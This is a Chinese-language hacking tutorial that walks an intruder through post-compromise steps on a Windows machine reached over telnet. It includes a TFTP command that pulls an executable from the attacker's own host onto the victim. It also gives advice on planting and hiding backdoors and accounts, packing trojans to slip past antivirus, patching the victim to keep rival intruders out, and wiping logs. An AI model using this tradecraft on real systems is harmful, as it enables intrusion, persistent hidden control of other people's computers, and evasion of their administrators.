講了不少有關于telnet服務的基礎內容，以及一些設備系統的安裝。但是，對于初學者而言，不禁有這樣的迷惑：我可以用telnet來做什么呢？現在就讓我們來分析一下telnet的應用都有哪些。

在telnet服務中該做什么

本來寫到上面就想結束了,不過許多朋友都說telnet上去后不知道該做什么了,既然這樣,那我就拋磚引玉吧,這次不講具體做法,只是說說思路,什么?為什么不講具體做法?篇幅不夠嘛,以后我會一一解釋的.

1 查看系統信息

呵呵,其實就是隨處看看,看看他的系統配置和版本（用type c:\boot.ini來知道pro版或server版）,看看都裝了什么服務或軟件（從目錄名就可以知道了）,看看有什么重要或有趣的文件啦（唉,要是國外的機器,看也看不懂）,看看他的用戶情況,總之就是盡可能多的了解系統,為一會裝后門摸底.

2 使用tftp傳送文件

想必大家都遇到過在telnet中傳輸文件的問題,因為我們習慣了在ipc管道中的文件傳輸,所以有些朋友喜歡用net share ipc$ 來打開管道,進而利用copy來傳輸文件.不過這樣反而麻煩,既然我們已經得到了shell,我們可以用TFPT命令來完成這一切,什么是TFTP呢?

用TFTP(Trivial File Transfer Protocol)來實現文件的傳送是一種基于UDP連接的文件傳輸,一般是使用Windows自帶的tftp.exe和一個TFTP服務器端軟件構成一個完整的傳輸結構.它是這樣使用的: 首先運行本地的TFTP Server（比如tftpd32.exe）軟件并保證始終開啟直至傳輸全部完成, 然后在telnet服務中（當然你也可以在其他shell中）運行下面的命令:

C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe

其中ip為你自己機器的ip,且上傳文件要與TFTP服務器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了（其實是從tftp服務器下載來的）.

需要指出的是,如果使用代理IP,你將不能實現與外部網絡的文件傳送.因為你的代理網關在進行數據封裝的時候會將自己的IP地址加入到你的數據報中,代替你的內部網絡地址,所以在外部網絡進行MAC尋址時是找不到你這臺TFTP服務器的.

3 安置后門

安置后門放在第二步好像早了點,如果你入侵還有其他目的,比如以破壞為主,或者是來修改主頁的,那么這些事情當然可以在安置后門之前做;如果你只是想得到一只肉雞,那就沒什么可說的了,安后門吧.

后門的種類繁多,也給我們提供了很大的選擇余地,能夠根據具體情況選擇合適的后門的確是一門學問.常用的后門一般有:木馬,asp木馬,遠程控制軟件,克隆帳戶,建立并隱藏帳戶,telnet,telnet擴展的shell,終端服務等.安置一個好的后門通常要注意以下幾點:

1 不會被防火墻查殺及阻礙通信:被加入病毒庫的后門最好加殼以逃過防火墻,盡量用低端口通信,以免被防火墻屏蔽.

2 最大限度增加隱蔽性:如果你選擇遠程控制軟件,要注意被控端的安裝提示和小圖標,以及是否同步畫面;如果你在帳戶上做文章,要盡量保持在cmd和用戶管理中都不出破綻;如果你選擇放木馬或telnet服務擴展,要注意文件和進程的隱藏;如果新開了終端服務（入侵前并沒有開）,一定要該掉3389這個顯眼的端口,且越低越好.

3 不要當管理員不存在:這是一個大忌,許多朋友在只有默認帳戶的機器上建立類似'hacking'的管理員帳戶,真是無知者無畏呀.所以安置后門的時候,想想管理員疏忽的地方會在哪里.

4 打補丁

如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的.怎么打補丁呢?這個也要問?想想你是怎么進來的吧.算了,提示一下,除了修補大的漏洞以外（上傳官方補丁并運行）,也要注意它的共享,ipc$共享（最好都關閉）,可疑端口,容易被利用的服務等.不過打補丁也要注意隱蔽性的,不要讓管理員發現大的改動.

5 清除日志

可以手動或利用軟件,如果不太會就去找相關教材吧,在這里我不詳細介紹了.